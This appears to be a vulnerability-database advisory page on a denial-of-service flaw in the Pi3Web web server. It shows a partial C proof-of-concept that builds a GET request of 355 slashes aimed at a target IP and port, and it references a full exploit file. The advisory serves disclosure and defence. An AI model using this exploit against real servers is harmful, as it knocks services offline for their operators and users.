• info
• discussion
• exploit
• solution
• references

Pi3Web Malformed GET Request Denial Of Service Vulnerability

The following snippet has been suggested by Holger Zimmermann to replace the equivalent lines in the exploit:

int main(int argc, char **argv)
{
int i, port, sd, rc;
char buffer[356];
char packet[380];
struct sockaddr_in server;

if(argc > 3 || argc < 2)
{
printf("USAGE: %s IP PORT\n", argv[0]);
printf("e.g. ./pi3web-DoS 127.0.0.1 80\n");
exit(0);
}
if(argc == 2) port = 80;
else port = atoi(argv[2]);

//Build the malformed request
for(i = 0; i < 355; i++) buffer[i] = '/';
buffer[i] = 0;
sprintf(packet, "GET %s HTTP/1.0\n\n", buffer);

The following proof of concept exploit has been supplied:

• /data/vulnerabilities/exploits/pi3web-DoS.c